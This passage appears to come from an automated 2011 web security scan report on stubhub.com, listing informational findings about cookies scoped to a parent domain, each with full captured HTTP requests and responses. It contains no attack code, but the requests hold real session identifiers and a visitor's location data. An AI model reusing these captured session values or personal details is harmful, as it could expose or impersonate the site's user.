Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119","ru":"http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669","r":"bing.fansnap.com","st":"","to":3,"c":"http://www.stubhub.com/","pv":1,"lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}; TLTHID=EC632AD4B23510B2E9D1AE6611395988

<ClientEventSet PostTimeStamp="1311100582301" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="6032" DateSince1970="1311100552237" PageId="ID13H35M46S205R0.5240641888231039" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:55 GMT
Server: Apache
Set-Cookie: TLTHID=379551A8B23610B2DCD699373A2BF429; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 180
Content-Type: text/html

<html>
<head>
<meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
<title id=titletext>OK</title>
</head>
<body bgcolor=white>
</body>

</html>



13.142. http://www.stubhub.com/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /assets/default.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/default.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTHID=E493C48AB23510B20181E6948C34E401; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E551BC2EB23510B2DFDBC89D01B99543; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 02 Feb 2010 04:41:07 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:37 GMT
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/css


13.143. http://www.stubhub.com/content/getPromoContent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /content/getPromoContent

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/getPromoContent HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 27
Origin: http://www.stubhub.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; fsr.a=1311100549160; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; s_sess=%20s_cc%3Dtrue%3B

pageType=BrowseTicketDetail

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: Apache
Set-Cookie: TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
com-stubhub-dye: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 71

<?xml version="1.0" encoding="UTF-8"?><blocks>No Promo Content</blocks>

13.144. http://www.stubhub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1311100552198; bn_u=6923598397700396013

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Apache
Set-Cookie: TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 23 Mar 2006 01:37:46 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................V...............3...33..3f..3...3...3...f...f3..ff..f...f...f........3...f...................3...f...................3...f.......
...[SNIP]...

13.145. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-dhtml-popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml-popup.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:49 GMT
Server: Apache
Set-Cookie: TLTHID=EC632AD4B23510B2E9D1AE6611395988; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:36 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:49 GMT
Vary: Accept-Encoding
Content-Length: 21520
Content-Type: text/javascript

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
FSR.Element.fsr$implement({fsr$getScrolls:function(){var B=this,A={x:0,y:0};while(B&&!FSR.isBody(B)){A.x+=B.scrollLeft;
A.y+=B.s
...[SNIP]...

13.146. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-dhtml.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; 